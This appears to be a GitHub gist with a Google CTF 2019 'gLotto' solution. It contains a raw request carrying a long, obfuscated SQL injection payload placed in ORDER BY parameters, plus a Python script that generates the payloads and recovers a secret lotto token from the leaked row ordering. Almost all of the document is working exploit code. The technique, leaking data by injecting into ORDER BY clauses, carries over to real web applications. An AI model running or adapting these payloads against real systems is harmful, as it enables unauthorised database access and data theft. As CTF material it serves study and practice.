Skip to content

Instantly share code, notes, and snippets.

@terjanq

terjanq/request.txt

Created June 30, 2019 16:42
Show Gist options
  • Save terjanq/10e02d521634a9e4563ac8194c82b8ed to your computer and use it in GitHub Desktop.
Save terjanq/10e02d521634a9e4563ac8194c82b8ed to your computer and use it in GitHub Desktop.
Download ZIP
gLotto solution #gctf2019 Google CTF
Raw
request.txt
https://glotto.web.ctfcompetition.com/?order0=date`=(SELECT+1337+FROM+(SELECT+@ll:=CAST(if(@f1<0,@f1%2b43,@f1)%2b36*if(@f2<0,@f2%2b43,@f2)%2b1296*if(@f3<0,@f3%2b43,@f3)%2b46656*if(@f4<0,@f4%2b43,@f4)%2b1679616*if(@f5<0,@f5%2b43,@f5)%2b60466176*if(@f6<0,@f6%2b43,@f6)%2b2176782336*if(@f7<0,@f7%2b43,@f7)%2b78364164096*if(@f8<0,@f8%2b43,@f8)%2b2821109907456*if(@f9<0,@f9%2b43,@f9)%2b101559956668416*if(@f10<0,@f10%2b43,@f10)AS+UNSIGNED)%2bCAST(3656158440062976*if(@f11<0,@f11%2b43,@f11)AS+UNSIGNED)%2bCAST(131621703842267136*if(@f12<0,@f12%2b43,@f12)AS+UNSIGNED)FROM+(SELECT+@f1:=ORD(SUBSTR(@lotto,1,1))-65)z1,(SELECT+@f2:=ORD(SUBSTR(@lotto,2,1))-65)z2,(SELECT+@f3:=ORD(SUBSTR(@lotto,3,1))-65)z3,(SELECT+@f4:=ORD(SUBSTR(@lotto,4,1))-65)z4,(SELECT+@f5:=ORD(SUBSTR(@lotto,5,1))-65)z5,(SELECT+@f6:=ORD(SUBSTR(@lotto,6,1))-65)z6,(SELECT+@f7:=ORD(SUBSTR(@lotto,7,1))-65)z7,(SELECT+@f8:=ORD(SUBSTR(@lotto,8,1))-65)z8,(SELECT+@f9:=ORD(SUBSTR(@lotto,9,1))-65)z9,(SELECT+@f10:=ORD(SUBSTR(@lotto,10,1))-65)z10,(SELECT+@f11:=ORD(SUBSTR(@lotto,11,1))-65)z11,(SELECT+@f12:=ORD(SUBSTR(@lotto,12,1))-65)z12)ll,(SELECT+@t:=(@ll+div+120960)%2540320)z0,(SELECT+@p0:=@t+div+5040)z1,(SELECT+@p1:=(@t%255040)div+720)z2,(SELECT+@p2:=(@t%25720)div+120)z3,(SELECT+@p3:=(@t%25120)div+24)z4,(SELECT+@p4:=(@t%2524)div+6)z5,(SELECT+@p5:=(@t%256)div+2)z6,(SELECT+@p6:=@t%252)z7,(SELECT+@p7:=0)z8,(SELECT+@r0:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+march,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1++HAVING+num=@p0)z))x0,(SELECT+@r1:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+march,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1+WHERE+a<>@r0+HAVING+num=@p1)z))x1,(SELECT+@r2:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+march,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1+WHERE+a<>@r0+AND+a<>@r1+HAVING+num=@p2)z))x2,(SELECT+@r3:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+march,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1+WHERE+a<>@r0+AND+a<>@r1+AND+a<>@r2+HAVING+num=@p3)z))x3,(SELECT+@r4:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+march,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1+WHERE+a<>@r0+AND+a<>@r1+AND+a<>@r2+AND+a<>@r3+HAVING+num=@p4)z))x4,(SELECT+@r5:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+march,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1+WHERE+a<>@r0+AND+a<>@r1+AND+a<>@r2+AND+a<>@r3+AND+a<>@r4+HAVING+num=@p5)z))x5,(SELECT+@r6:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+march,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1+WHERE+a<>@r0+AND+a<>@r1+AND+a<>@r2+AND+a<>@r3+AND+a<>@r4+AND+a<>@r5+HAVING+num=@p6)z))x6,(SELECT+@r7:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+march,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1+WHERE+a<>@r0+AND+a<>@r1+AND+a<>@r2+AND+a<>@r3+AND+a<>@r4+AND+a<>@r5+AND+a<>@r6+HAVING+num=@p7)z))x7),day(date)=if(@r0=0,1,if(@r0=1,5,if(@r0=2,10,if(@r0=3,13,if(@r0=4,18,if(@r0=5,23,if(@r0=6,28,30))))))),day(date)=if(@r1=0,1,if(@r1=1,5,if(@r1=2,10,if(@r1=3,13,if(@r1=4,18,if(@r1=5,23,if(@r1=6,28,30))))))),day(date)=if(@r2=0,1,if(@r2=1,5,if(@r2=2,10,if(@r2=3,13,if(@r2=4,18,if(@r2=5,23,if(@r2=6,28,30))))))),day(date)=if(@r3=0,1,if(@r3=1,5,if(@r3=2,10,if(@r3=3,13,if(@r3=4,18,if(@r3=5,23,if(@r3=6,28,30))))))),day(date)=if(@r4=0,1,if(@r4=1,5,if(@r4=2,10,if(@r4=3,13,if(@r4=4,18,if(@r4=5,23,if(@r4=6,28,30))))))),day(date)=if(@r5=0,1,if(@r5=1,5,if(@r5=2,10,if(@r5=3,13,if(@r5=4,18,if(@r5=5,23,if(@r5=6,28,30))))))),day(date)=if(@r6=0,1,if(@r6=1,5,if(@r6=2,10,if(@r6=3,13,if(@r6=4,18,if(@r6=5,23,if(@r6=6,28,30))))))),day(date)=if(@r7=0,1,if(@r7=1,5,if(@r7=2,10,if(@r7=3,13,if(@r7=4,18,if(@r7=5,23,if(@r7=6,28,30)))))))--+&order1=date`=(SELECT+1337+FROM+(SELECT+@ll:=CAST(if(@f1<0,@f1%2b43,@f1)%2b36*if(@f2<0,@f2%2b43,@f2)%2b1296*if(@f3<0,@f3%2b43,@f3)%2b46656*if(@f4<0,@f4%2b43,@f4)%2b1679616*if(@f5<0,@f5%2b43,@f5)%2b60466176*if(@f6<0,@f6%2b43,@f6)%2b2176782336*if(@f7<0,@f7%2b43,@f7)%2b78364164096*if(@f8<0,@f8%2b43,@f8)%2b2821109907456*if(@f9<0,@f9%2b43,@f9)%2b101559956668416*if(@f10<0,@f10%2b43,@f10)AS+UNSIGNED)%2bCAST(3656158440062976*if(@f11<0,@f11%2b43,@f11)AS+UNSIGNED)%2bCAST(131621703842267136*if(@f12<0,@f12%2b43,@f12)AS+UNSIGNED)FROM+(SELECT+@f1:=ORD(SUBSTR(@lotto,1,1))-65)z1,(SELECT+@f2:=ORD(SUBSTR(@lotto,2,1))-65)z2,(SELECT+@f3:=ORD(SUBSTR(@lotto,3,1))-65)z3,(SELECT+@f4:=ORD(SUBSTR(@lotto,4,1))-65)z4,(SELECT+@f5:=ORD(SUBSTR(@lotto,5,1))-65)z5,(SELECT+@f6:=ORD(SUBSTR(@lotto,6,1))-65)z6,(SELECT+@f7:=ORD(SUBSTR(@lotto,7,1))-65)z7,(SELECT+@f8:=ORD(SUBSTR(@lotto,8,1))-65)z8,(SELECT+@f9:=ORD(SUBSTR(@lotto,9,1))-65)z9,(SELECT+@f10:=ORD(SUBSTR(@lotto,10,1))-65)z10,(SELECT+@f11:=ORD(SUBSTR(@lotto,11,1))-65)z11,(SELECT+@f12:=ORD(SUBSTR(@lotto,12,1))-65)z12)ll,(SELECT+@t:=(@ll+div+4877107200)%25362880)z0,(SELECT+@p0:=@t+div+40320)z1,(SELECT+@p1:=(@t%2540320)div+5040)z2,(SELECT+@p2:=(@t%255040)div+720)z3,(SELECT+@p3:=(@t%25720)div+120)z4,(SELECT+@p4:=(@t%25120)div+24)z5,(SELECT+@p5:=(@t%2524)div+6)z6,(SELECT+@p6:=(@t%256)div+2)z7,(SELECT+@p7:=@t%252)z8,(SELECT+@p8:=0)z9,(SELECT+@r0:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+april,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1++HAVING+num=@p0)z))x0,(SELECT+@r1:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+april,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1+WHERE+a<>@r0+HAVING+num=@p1)z))x1,(SELECT+@r2:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+april,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1+WHERE+a<>@r0+AND+a<>@r1+HAVING+num=@p2)z))x2,(SELECT+@r3:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+april,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1+WHERE+a<>@r0+AND+a<>@r1+AND+a<>@r2+HAVING+num=@p3)z))x3,(SELECT+@r4:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+april,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1+WHERE+a<>@r0+AND+a<>@r1+AND+a<>@r2+AND+a<>@r3+HAVING+num=@p4)z))x4,(SELECT+@r5:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+april,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1+WHERE+a<>@r0+AND+a<>@r1+AND+a<>@r2+AND+a<>@r3+AND+a<>@r4+HAVING+num=@p5)z))x5,(SELECT+@r6:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+april,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1+WHERE+a<>@r0+AND+a<>@r1+AND+a<>@r2+AND+a<>@r3+AND+a<>@r4+AND+a<>@r5+HAVING+num=@p6)z))x6,(SELECT+@r7:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+april,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1+WHERE+a<>@r0+AND+a<>@r1+AND+a<>@r2+AND+a<>@r3+AND+a<>@r4+AND+a<>@r5+AND+a<>@r6+HAVING+num=@p7)z))x7,(SELECT+@r8:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+april,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1+WHERE+a<>@r0+AND+a<>@r1+AND+a<>@r2+AND+a<>@r3+AND+a<>@r4+AND+a<>@r5+AND+a<>@r6+AND+a<>@r7+HAVING+num=@p8)z))x8),day(date)=if(@r0=0,1,if(@r0=1,2,if(@r0=2,6,if(@r0=3,10,if(@r0=4,12,if(@r0=5,14,if(@r0=6,18,if(@r0=7,22,27)))))))),day(date)=if(@r1=0,1,if(@r1=1,2,if(@r1=2,6,if(@r1=3,10,if(@r1=4,12,if(@r1=5,14,if(@r1=6,18,if(@r1=7,22,27)))))))),day(date)=if(@r2=0,1,if(@r2=1,2,if(@r2=2,6,if(@r2=3,10,if(@r2=4,12,if(@r2=5,14,if(@r2=6,18,if(@r2=7,22,27)))))))),day(date)=if(@r3=0,1,if(@r3=1,2,if(@r3=2,6,if(@r3=3,10,if(@r3=4,12,if(@r3=5,14,if(@r3=6,18,if(@r3=7,22,27)))))))),day(date)=if(@r4=0,1,if(@r4=1,2,if(@r4=2,6,if(@r4=3,10,if(@r4=4,12,if(@r4=5,14,if(@r4=6,18,if(@r4=7,22,27)))))))),day(date)=if(@r5=0,1,if(@r5=1,2,if(@r5=2,6,if(@r5=3,10,if(@r5=4,12,if(@r5=5,14,if(@r5=6,18,if(@r5=7,22,27)))))))),day(date)=if(@r6=0,1,if(@r6=1,2,if(@r6=2,6,if(@r6=3,10,if(@r6=4,12,if(@r6=5,14,if(@r6=6,18,if(@r6=7,22,27)))))))),day(date)=if(@r7=0,1,if(@r7=1,2,if(@r7=2,6,if(@r7=3,10,if(@r7=4,12,if(@r7=5,14,if(@r7=6,18,if(@r7=7,22,27)))))))),day(date)=if(@r8=0,1,if(@r8=1,2,if(@r8=2,6,if(@r8=3,10,if(@r8=4,12,if(@r8=5,14,if(@r8=6,18,if(@r8=7,22,27))))))))--+&order2=date`=(SELECT+exp(if(@ll>1769804660736000,1337,9))+FROM+(SELECT+@ll:=CAST(if(@f1<0,@f1%2b43,@f1)%2b36*if(@f2<0,@f2%2b43,@f2)%2b1296*if(@f3<0,@f3%2b43,@f3)%2b46656*if(@f4<0,@f4%2b43,@f4)%2b1679616*if(@f5<0,@f5%2b43,@f5)%2b60466176*if(@f6<0,@f6%2b43,@f6)%2b2176782336*if(@f7<0,@f7%2b43,@f7)%2b78364164096*if(@f8<0,@f8%2b43,@f8)%2b2821109907456*if(@f9<0,@f9%2b43,@f9)%2b101559956668416*if(@f10<0,@f10%2b43,@f10)AS+UNSIGNED)%2bCAST(3656158440062976*if(@f11<0,@f11%2b43,@f11)AS+UNSIGNED)%2bCAST(131621703842267136*if(@f12<0,@f12%2b43,@f12)AS+UNSIGNED)FROM+(SELECT+@f1:=ORD(SUBSTR(@lotto,1,1))-65)z1,(SELECT+@f2:=ORD(SUBSTR(@lotto,2,1))-65)z2,(SELECT+@f3:=ORD(SUBSTR(@lotto,3,1))-65)z3,(SELECT+@f4:=ORD(SUBSTR(@lotto,4,1))-65)z4,(SELECT+@f5:=ORD(SUBSTR(@lotto,5,1))-65)z5,(SELECT+@f6:=ORD(SUBSTR(@lotto,6,1))-65)z6,(SELECT+@f7:=ORD(SUBSTR(@lotto,7,1))-65)z7,(SELECT+@f8:=ORD(SUBSTR(@lotto,8,1))-65)z8,(SELECT+@f9:=ORD(SUBSTR(@lotto,9,1))-65)z9,(SELECT+@f10:=ORD(SUBSTR(@lotto,10,1))-65)z10,(SELECT+@f11:=ORD(SUBSTR(@lotto,11,1))-65)z11,(SELECT+@f12:=ORD(SUBSTR(@lotto,12,1))-65)z12)ll,(SELECT+@t:=(@ll+div+24)%255040)z0,(SELECT+@p0:=@t+div+720)z1,(SELECT+@p1:=(@t%25720)div+120)z2,(SELECT+@p2:=(@t%25120)div+24)z3,(SELECT+@p3:=(@t%2524)div+6)z4,(SELECT+@p4:=(@t%256)div+2)z5,(SELECT+@p5:=@t%252)z6,(SELECT+@p6:=0)z7,(SELECT+@r0:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+may,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1++HAVING+num=@p0)z))x0,(SELECT+@r1:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+may,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1+WHERE+a<>@r0+HAVING+num=@p1)z))x1,(SELECT+@r2:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+may,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1+WHERE+a<>@r0+AND+a<>@r1+HAVING+num=@p2)z))x2,(SELECT+@r3:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+may,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1+WHERE+a<>@r0+AND+a<>@r1+AND+a<>@r2+HAVING+num=@p3)z))x3,(SELECT+@r4:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+may,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1+WHERE+a<>@r0+AND+a<>@r1+AND+a<>@r2+AND+a<>@r3+HAVING+num=@p4)z))x4,(SELECT+@r5:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+may,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1+WHERE+a<>@r0+AND+a<>@r1+AND+a<>@r2+AND+a<>@r3+AND+a<>@r4+HAVING+num=@p5)z))x5,(SELECT+@r6:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+may,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1+WHERE+a<>@r0+AND+a<>@r1+AND+a<>@r2+AND+a<>@r3+AND+a<>@r4+AND+a<>@r5+HAVING+num=@p6)z))x6),day(date)=if(@r0=0,1,if(@r0=1,4,if(@r0=2,9,if(@r0=3,10,if(@r0=4,16,if(@r0=5,20,25)))))),day(date)=if(@r1=0,1,if(@r1=1,4,if(@r1=2,9,if(@r1=3,10,if(@r1=4,16,if(@r1=5,20,25)))))),day(date)=if(@r2=0,1,if(@r2=1,4,if(@r2=2,9,if(@r2=3,10,if(@r2=4,16,if(@r2=5,20,25)))))),day(date)=if(@r3=0,1,if(@r3=1,4,if(@r3=2,9,if(@r3=3,10,if(@r3=4,16,if(@r3=5,20,25)))))),day(date)=if(@r4=0,1,if(@r4=1,4,if(@r4=2,9,if(@r4=3,10,if(@r4=4,16,if(@r4=5,20,25)))))),day(date)=if(@r5=0,1,if(@r5=1,4,if(@r5=2,9,if(@r5=3,10,if(@r5=4,16,if(@r5=5,20,25)))))),day(date)=if(@r6=0,1,if(@r6=1,4,if(@r6=2,9,if(@r6=3,10,if(@r6=4,16,if(@r6=5,20,25))))))--+&order3=date`=(SELECT+1337+FROM+(SELECT+@ll:=CAST(if(@f1<0,@f1%2b43,@f1)%2b36*if(@f2<0,@f2%2b43,@f2)%2b1296*if(@f3<0,@f3%2b43,@f3)%2b46656*if(@f4<0,@f4%2b43,@f4)%2b1679616*if(@f5<0,@f5%2b43,@f5)%2b60466176*if(@f6<0,@f6%2b43,@f6)%2b2176782336*if(@f7<0,@f7%2b43,@f7)%2b78364164096*if(@f8<0,@f8%2b43,@f8)%2b2821109907456*if(@f9<0,@f9%2b43,@f9)%2b101559956668416*if(@f10<0,@f10%2b43,@f10)AS+UNSIGNED)%2bCAST(3656158440062976*if(@f11<0,@f11%2b43,@f11)AS+UNSIGNED)%2bCAST(131621703842267136*if(@f12<0,@f12%2b43,@f12)AS+UNSIGNED)FROM+(SELECT+@f1:=ORD(SUBSTR(@lotto,1,1))-65)z1,(SELECT+@f2:=ORD(SUBSTR(@lotto,2,1))-65)z2,(SELECT+@f3:=ORD(SUBSTR(@lotto,3,1))-65)z3,(SELECT+@f4:=ORD(SUBSTR(@lotto,4,1))-65)z4,(SELECT+@f5:=ORD(SUBSTR(@lotto,5,1))-65)z5,(SELECT+@f6:=ORD(SUBSTR(@lotto,6,1))-65)z6,(SELECT+@f7:=ORD(SUBSTR(@lotto,7,1))-65)z7,(SELECT+@f8:=ORD(SUBSTR(@lotto,8,1))-65)z8,(SELECT+@f9:=ORD(SUBSTR(@lotto,9,1))-65)z9,(SELECT+@f10:=ORD(SUBSTR(@lotto,10,1))-65)z10,(SELECT+@f11:=ORD(SUBSTR(@lotto,11,1))-65)z11,(SELECT+@f12:=ORD(SUBSTR(@lotto,12,1))-65)z12)ll,(SELECT+@t:=@ll%2524)z0,(SELECT+@p0:=@t+div+6)z1,(SELECT+@p1:=(@t%256)div+2)z2,(SELECT+@p2:=@t%252)z3,(SELECT+@p3:=0)z4,(SELECT+@r0:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+june,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1++HAVING+num=@p0)z))x0,(SELECT+@r1:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+june,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1+WHERE+a<>@r0+HAVING+num=@p1)z))x1,(SELECT+@r2:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+june,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1+WHERE+a<>@r0+AND+a<>@r1+HAVING+num=@p2)z))x2,(SELECT+@r3:=(SELECT+a+FROM+(SELECT+(@n:=@n%2b1)num,+a+FROM+(SELECT(@g:=@g%2b1)a+FROM+june,(SELECT@g:=-1)h)z0,+(SELECT+@n:=-1)z1+WHERE+a<>@r0+AND+a<>@r1+AND+a<>@r2+HAVING+num=@p3)z))x3),day(date)=if(@r0=0,1,if(@r0=1,4,if(@r0=2,8,22))),day(date)=if(@r1=0,1,if(@r1=1,4,if(@r1=2,8,22))),day(date)=if(@r2=0,1,if(@r2=1,4,if(@r2=2,8,22))),day(date)=if(@r3=0,1,if(@r3=1,4,if(@r3=2,8,22)))--+
Raw
solve_glotto.py
import math
import requests
import re
pre_36 = ['']
for i in range(1, 15):
pre_36.append(str(36**i)+'*')
print(pre_36[10], pre_36[11])
def calculate_number(k):
res = '(SELECT @ll:=CAST(%sAS UNSIGNED)' % '+'.join([pre_36[i-1]+'if(@f{i}<0,@f{i}+43,@f{i})'.format(i=i) for i in range(1,k-1)])
res += '+CAST(3656158440062976*if(@f11<0,@f11+43,@f11)AS UNSIGNED)+CAST(131621703842267136*if(@f12<0,@f12+43,@f12)AS UNSIGNED)'
res += '\nFROM '
for i in range(1, k+1):
res += '(SELECT @f{i}:=ORD(SUBSTR(@lotto,{i},1))-65)z{i},\n'.format(i=i)
res = res[:-2]
res += ')ll'
return res
def generate_unions(n):
tb = ''
if n==4:
tb = 'june'
if n == 7:
tb = 'may'
if n == 8:
tb = 'march'
if n == 9:
tb = 'april'
return 'SELECT(@g:=@g+1)a FROM %s,(SELECT@g:=-1)h'%tb
res = 'SELECT 0 a'
for i in range(1,n):
res += ' UNION SELECT %d'%i
return res
def generate_perm_pos(k,n):
tmpl = 'SELECT a FROM (SELECT (@n:=@n+1)num, a FROM ({unions})z0, (SELECT @n:=-1)z1 {conditions} HAVING num=@p{k})z'
conditions = ' AND '.join(['a<>@r{i}'.format(i=i) for i in range(0,k)])
if conditions:
conditions = 'WHERE ' + conditions
else:
conditions = ''
return tmpl.format(conditions = conditions, k=k, unions=generate_unions(n))
def generate_results(k):
t = ',\n'.join(['(SELECT @r{i}:=({perm}))x{i}'.format(i=i,perm=generate_perm_pos(i,k)) for i in range(0,k)])
return t
def generate_if(k, tokens, n):
if_tpl = 'if(_C_,_A_,_B_)'
res = if_tpl
for i in range(0, len(tokens)-1):
token = tokens[i]
res = res.replace('_C_','@r{k}={i}'.format(k=k,i=i))
res = res.replace('_A_', token)
res = res.replace('_B_', if_tpl)
res = res.replace(if_tpl, tokens[-1])
return res
whens = ' '.join(['WHEN @r{k}={i} THEN {token}'.format(k=k,i=i,token=tokens[i]) for i in range(0,n)])
return 'CASE {whens} END'.format(whens=whens)
'''
CREATE TABLE test (
date INT AUTO_INCREMENT,
winner char(12),
PRIMARY KEY (date)
);
INSERT INTO test (winner) VALUES ('1JJL716ATSCZ');
INSERT INTO test (winner) VALUES ('G0O9L3XPS3IR');
INSERT INTO test (winner) VALUES ('WXRJP8D4KKJQ');
INSERT INTO test (winner) VALUES ('YELDF36F4TW7');
'''
def sqli(r):
return 'SELECT * FROM test ORDER BY `{r}`'.format(r=r)
def string_to_hex_mysql(string):
# return '1111885200'
try:
return '0x' + str(string).encode().hex().upper()
except:
# py2.7 fallback
return '0x' + str(string).encode('hex').upper()
def list_str_to_hex(list_string):
return list(map(string_to_hex_mysql, list_string))
march_tokens = list(map(str,[
1,
5,
10,
13,
18,
23,
28,
30,
]))
april_tokens = list(map(str,[
1,
2,
6,
10,
12,
14,
18,
22,
27,
]))
may_tokens = list(map(str,[
1,
4,
9,
10,
16,
20,
25,
]))
june_tokens = list(map(str,[
1,
4,
8,
22,
]))
# 0!: 1
# 1!: 1
# 2!: 2
# 3!: 6
# 4!: 24
# 5!: 120
# 6!: 720
# 7!: 5040
# 8!: 40320
# 9!: 362880
def generate_positions(k, starter):
conds = [starter, '@p0:=@t div %d' % math.factorial(k-1)]
for i in range(1, k-2):
conds.append('@p%i:=(@t%%%d)div %d' % (i,math.factorial(k-i),math.factorial(k-i-1)))
conds.append('@p%d:=@t%%2' % (k-2))
conds.append('@p%d:=0' % (k-1))
return ','.join('(SELECT {c})z{i}'.format(i=i, c=conds[i]) for i in range(0,k+1))
def generate_payload_month(tokens, starter,witherror=False):
n = len(tokens)
positions = generate_positions(n, starter)
results = generate_results(n)
number = calculate_number(12)
ifs = ','.join(['day(date)={iff}'.format(iff=generate_if(i,tokens,n)) for i in range(0,n)])
handler = 'exp(if(@ll>1769804660736000,1337,9))' if witherror else '1337'
return 'date`=(SELECT {handler} FROM {number},{positions},{results}),{ifs}-- '.format(handler=handler, number=number,positions=positions, results=results, ifs=ifs).replace('\n','')
def generate_payload():
p_4 = generate_payload_month(june_tokens, '@t:=@ll%24')
p_7 = generate_payload_month(may_tokens, '@t:=(@ll div 24)%5040',True)
p_8 = generate_payload_month(march_tokens, '@t:=(@ll div 120960)%40320')
p_9 = generate_payload_month(april_tokens, '@t:=(@ll div 4877107200)%362880')
return my_encode('?order0=%s&order1=%s&order2=%s&order3=%s' % (p_8, p_9, p_7, p_4))
def token_to_number(token):
alph = list('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
n = len(alph)
dd = {alph[i]:i for i in range(0,n)}
res = 0
for i in range(0, len(token)):
res += (n**i)*dd[token[i]]
return res
def my_encode(s):
return s.replace('\n', '').replace('%','%25').replace('+','%2b').replace(' ','+')
###### map day to perm
def _parse_table_to_list(raw_data):
ret_data = [
[],
[],
[],
[],
]
all_tables = re.findall(r'(?:<table class="table">)(.*?)(?:</table>)', raw_data, re.MULTILINE | re.DOTALL)
for table_id, table_raw in enumerate(all_tables):
all_dates = re.findall(r'(?:<td>)(\d{4}-\d{2}-\d{2})(?:</td>)', table_raw)
for date in all_dates:
ret_data[table_id].append(int(date.split('-')[-1]))
return ret_data
def get_perm_data(raw_page_html):
original_list = [
{
1: 0,
5: 1,
10: 2,
13: 3,
18: 4,
23: 5,
28: 6,
30: 7,
},
{
1: 0,
2: 1,
6: 2,
10: 3,
12: 4,
14: 5,
18: 6,
22: 7,
27: 8,
},
{
1: 0,
4: 1,
9: 2,
10: 3,
16: 4,
20: 5,
25: 6,
},
{
1: 0,
4: 1,
8: 2,
22: 3,
}
]
data_parsed = _parse_table_to_list(raw_page_html)
ret_data = [
[],
[],
[],
[],
]
for table_id, table_datas in enumerate(data_parsed):
for day in table_datas:
ret_data[table_id].append(original_list[table_id][day])
return ret_data
s = requests.Session()
def perm_data_to_token(perm_data):
def strong(n):
return 1 if n <= 1 else strong(n-1) * n
def perm_to_num(arr):
ret = 0
arr = arr[::-1]
for i in range(len(arr)):
ret += strong(len(arr)-i-1) * list(sorted(arr[i:])).index(arr[i])
return ret
def part_to_num(ll):
(a, b, c, d) = ll
return (
a +
b * strong(4) +
c * strong(4) * strong(7) +
d * strong(4) * strong(7) * strong(8)
)
def number_to_token(number):
alph = list('ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
n = len(alph)
res = ''
for _ in range(12):
res = res + alph[number % n]
number = number // n
return res
perm_data.sort(key=len)
value = part_to_num(tuple(map(perm_to_num, perm_data)))
return number_to_token(value)
url = 'https://glotto.web.ctfcompetition.com/'+generate_payload()
print(url)
print(len(url))
while True:
s = requests.Session()
t = s.get(url)
if t.status_code != 200:
print(t.status_code)
continue
if 'Win The Lotto!' not in t.text:
print('Token too big')
continue
perm_data = get_perm_data(t.text)
print('perm_data', perm_data)
token = perm_data_to_token(perm_data)
print('token', token)
print('session', s.cookies['PHPSESSID'])
break
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment